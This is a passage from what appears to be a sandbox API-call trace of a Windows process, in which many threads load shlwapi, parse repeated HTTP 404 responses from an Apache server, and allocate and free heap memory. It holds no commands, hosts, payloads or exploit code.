(HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0312.485] GetProcessHeap () returned 0x6a0000 [0312.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0312.485] GetProcessHeap () returned 0x6a0000 [0312.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 622 os_tid = 0x192c [0312.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.814] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.814] GetProcessHeap () returned 0x6a0000 [0312.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0312.814] GetProcessHeap () returned 0x6a0000 [0312.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0312.814] GetProcessHeap () returned 0x6a0000 [0312.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 623 os_tid = 0x1930 [0313.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.020] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.020] GetProcessHeap () returned 0x6a0000 [0313.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0313.020] GetProcessHeap () returned 0x6a0000 [0313.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0313.020] GetProcessHeap () returned 0x6a0000 [0313.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 624 os_tid = 0x1934 [0313.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.187] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.187] GetProcessHeap () returned 0x6a0000 [0313.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0313.187] GetProcessHeap () returned 0x6a0000 [0313.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0313.188] GetProcessHeap () returned 0x6a0000 [0313.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 625 os_tid = 0x1938 [0313.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.392] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.392] GetProcessHeap () returned 0x6a0000 [0313.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0313.426] GetProcessHeap () returned 0x6a0000 [0313.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0313.426] GetProcessHeap () returned 0x6a0000 [0313.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 626 os_tid = 0x193c [0313.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.832] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.832] GetProcessHeap () returned 0x6a0000 [0313.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0313.833] GetProcessHeap () returned 0x6a0000 [0313.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0313.833] GetProcessHeap () returned 0x6a0000 [0313.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 627 os_tid = 0x1940 [0314.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.196] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.196] GetProcessHeap () returned 0x6a0000 [0314.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0314.196] GetProcessHeap () returned 0x6a0000 [0314.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0314.196] GetProcessHeap () returned 0x6a0000 [0314.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 628 os_tid = 0x1944 [0314.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.657] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.658] GetProcessHeap () returned 0x6a0000 [0314.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0314.658] GetProcessHeap () returned 0x6a0000 [0314.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0314.658] GetProcessHeap () returned 0x6a0000 [0314.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 629 os_tid = 0x1948 [0314.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.915] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.915] GetProcessHeap () returned 0x6a0000 [0314.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0314.915] GetProcessHeap () returned 0x6a0000 [0314.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0314.915] GetProcessHeap () returned 0x6a0000 [0314.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 630 os_tid = 0x194c [0315.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.062] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.062] GetProcessHeap () returned 0x6a0000 [0315.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0315.062] GetProcessHeap () returned 0x6a0000 [0315.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0315.062] GetProcessHeap () returned 0x6a0000 [0315.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 631 os_tid = 0x1968 [0315.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.282] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.282] GetProcessHeap () returned 0x6a0000 [0315.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0315.282] GetProcessHeap () returned 0x6a0000 [0315.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0315.282] GetProcessHeap () returned 0x6a0000 [0315.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 632 os_tid = 0x196c [0315.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.475] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.475] GetProcessHeap () returned 0x6a0000 [0315.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0315.475] GetProcessHeap () returned 0x6a0000 [0315.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0315.475] GetProcessHeap () returned 0x6a0000 [0315.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 633 os_tid = 0x1978 [0315.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.792] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.793] GetProcessHeap () returned 0x6a0000 [0315.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0315.793] GetProcessHeap () returned 0x6a0000 [0315.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0315.793] GetProcessHeap () returned 0x6a0000 [0315.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 634 os_tid = 0x197c [0316.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.130] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.130] GetProcessHeap () returned 0x6a0000 [0316.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be838 [0316.131] GetProcessHeap () returned 0x6a0000 [0316.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be838 | out: hHeap=0x6a0000) returned 1 [0316.131] GetProcessHeap () returned 0x6a0000 [0316.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 635 os_tid = 0x1988 [0316.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.355] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.355] GetProcessHeap () returned 0x6a0000 [0316.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0316.355] GetProcessHeap () returned 0x6a0000 [0316.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0316.355] GetProcessHeap () returned 0x6a0000 [0316.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 636 os_tid = 0x1990 [0316.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.607] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.608] GetProcessHeap () returned 0x6a0000 [0316.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0316.608] GetProcessHeap () returned 0x6a0000 [0316.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0316.608] GetProcessHeap () returned 0x6a0000 [0316.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 637 os_tid = 0x1994 [0316.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.979] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.980] GetProcessHeap () returned 0x6a0000 [0316.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0316.980] GetProcessHeap () returned 0x6a0000 [0316.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0316.980] GetProcessHeap () returned 0x6a0000 [0316.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 638 os_tid = 0x1998 [0317.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.167] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.167] GetProcessHeap () returned 0x6a0000 [0317.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0317.167] GetProcessHeap () returned 0x6a0000 [0317.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0317.167] GetProcessHeap () returned 0x6a0000 [0317.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 639 os_tid = 0x199c [0317.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.425] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.425] GetProcessHeap () returned 0x6a0000 [0317.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0317.425] GetProcessHeap () returned 0x6a0000 [0317.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0317.426] GetProcessHeap () returned 0x6a0000 [0317.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 640 os_tid = 0x19a0 [0317.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.594] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.594] GetProcessHeap () returned 0x6a0000 [0317.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0317.594] GetProcessHeap () returned 0x6a0000 [0317.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0317.594] GetProcessHeap () returned 0x6a0000 [0317.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 641 os_tid = 0x19a4 [0317.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.790] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:44 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.790] GetProcessHeap () returned 0x6a0000 [0317.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0317.790] GetProcessHeap () returned 0x6a0000 [0317.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0317.790] GetProcessHeap () returned 0x6a0000 [0317.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 642 os_tid = 0x19a8 [0317.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0317.990] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.990] GetProcessHeap () returned 0x6a0000 [0317.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0317.990] GetProcessHeap () returned 0x6a0000 [0317.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0317.990] GetProcessHeap () returned 0x6a0000 [0317.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 643 os_tid = 0x19ac [0318.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.210] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.210] GetProcessHeap () returned 0x6a0000 [0318.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0318.210] GetProcessHeap () returned 0x6a0000 [0318.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0318.211] GetProcessHeap () returned 0x6a0000 [0318.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 644 os_tid = 0x19b0 [0318.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.406] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.406] GetProcessHeap () returned 0x6a0000 [0318.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0318.407] GetProcessHeap () returned 0x6a0000 [0318.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0318.407] GetProcessHeap () returned 0x6a0000 [0318.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 645 os_tid = 0x19b4 [0318.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.716] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.716] GetProcessHeap () returned 0x6a0000 [0318.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0318.716] GetProcessHeap () returned 0x6a0000 [0318.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0318.716] GetProcessHeap () returned 0x6a0000 [0318.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 646 os_tid = 0x19b8 [0318.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.983] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:45 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.983] GetProcessHeap () returned 0x6a0000 [0318.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0318.983] GetProcessHeap () returned 0x6a0000 [0318.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0318.983] GetProcessHeap () returned 0x6a0000 [0318.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 647 os_tid = 0x19bc [0319.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.370] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.370] GetProcessHeap () returned 0x6a0000 [0319.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea00 [0319.370] GetProcessHeap () returned 0x6a0000 [0319.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea00 | out: hHeap=0x6a0000) returned 1 [0319.370] GetProcessHeap () returned 0x6a0000 [0319.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da320 | out: hHeap=0x6a0000) returned 1 Thread: id = 648 os_tid = 0x19c0 [0319.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.651] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.651] GetProcessHeap () returned 0x6a0000 [0319.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0319.652] GetProcessHeap () returned 0x6a0000 [0319.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0319.652] GetProcessHeap () returned 0x6a0000 [0319.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 649 os_tid = 0x19c4 [0319.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.920] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:46 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.920] GetProcessHeap () returned 0x6a0000 [0319.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0319.920] GetProcessHeap () returned 0x6a0000 [0319.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0319.920] GetProcessHeap () returned 0x6a0000 [0319.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 650 os_tid = 0x19c8 [0320.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.061] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.061] GetProcessHeap () returned 0x6a0000 [0320.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0320.061] GetProcessHeap () returned 0x6a0000 [0320.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0320.061] GetProcessHeap () returned 0x6a0000 [0320.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 651 os_tid = 0x19cc [0320.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.404] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:47 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.404] GetProcessHeap () returned 0x6a0000 [0320.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0320.404] GetProcessHeap () returned 0x6a0000 [0320.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0320.404] GetProcessHeap () returned 0x6a0000 [0320.409] 